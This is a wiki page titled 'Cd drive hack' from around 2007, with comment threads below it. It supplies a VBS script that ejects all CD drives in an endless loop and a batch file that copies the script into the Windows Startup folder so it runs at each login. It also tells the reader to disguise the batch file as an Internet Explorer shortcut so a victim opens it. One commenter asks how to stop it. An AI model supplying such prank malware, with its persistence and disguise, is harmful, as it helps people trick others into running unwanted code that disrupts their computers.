Cd drive hackThis is a featured page

This knowledge is donated by


jai prakash
jai1147@gmail.com



Here jai147
will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.


click

to message him
`cheers`


rahuldutt1
rahuldutt1
Latest page update: made by rahuldutt1 , Oct 30 2007, 2:26 AM EDT (about this update About This Update rahuldutt1 Edited by rahuldutt1

3 words added

view changes

- complete history)
Keyword tags: CD drive Cd drive hack
More Info: links to this page
Started By Thread Subject Replies Last Post
harpreets12 Every information of interesting articles 0 Oct 29 2008, 2:02 AM EDT by harpreets12
Thread started: Oct 29 2008, 2:02 AM EDT  Watch
Every information of interesting articles is copied from www.prandobely.co.cc which now contains more than 500 pages on hacking
1  out of 1 found this valuable. Do you?    
Keyword tags: None
bikez09 Help me man 5 Aug 21 2008, 4:13 AM EDT by harpreets12
Thread started: Nov 17 2007, 3:32 PM EST  Watch
Hey Man How to stop This Thing please help me........
2  out of 3 found this valuable. Do you?    
Keyword tags: CD drive Cd drive hack
Show Last Reply
harpreets12 Simply copied 0 Aug 21 2008, 4:09 AM EDT by harpreets12
Thread started: Aug 21 2008, 4:09 AM EDT  Watch
This information is simply copied and have putten it's name from site called www.advancedmail.wetpaint.com which contains over 100 pages of hacking
0  out of 2 found this valuable. Do you?    
Keyword tags: CD drive Cd drive hack
Showing 3 of 3 threads for this page

Related Content

  (what's this?Related ContentThanks to keyword tags, links to related pages and threads are added to the bottom of your pages. Up to 15 links are shown, determined by matching tags and by how recently the content was updated; keeping the most current at the top. Share your feedback on Wetpaint Central.)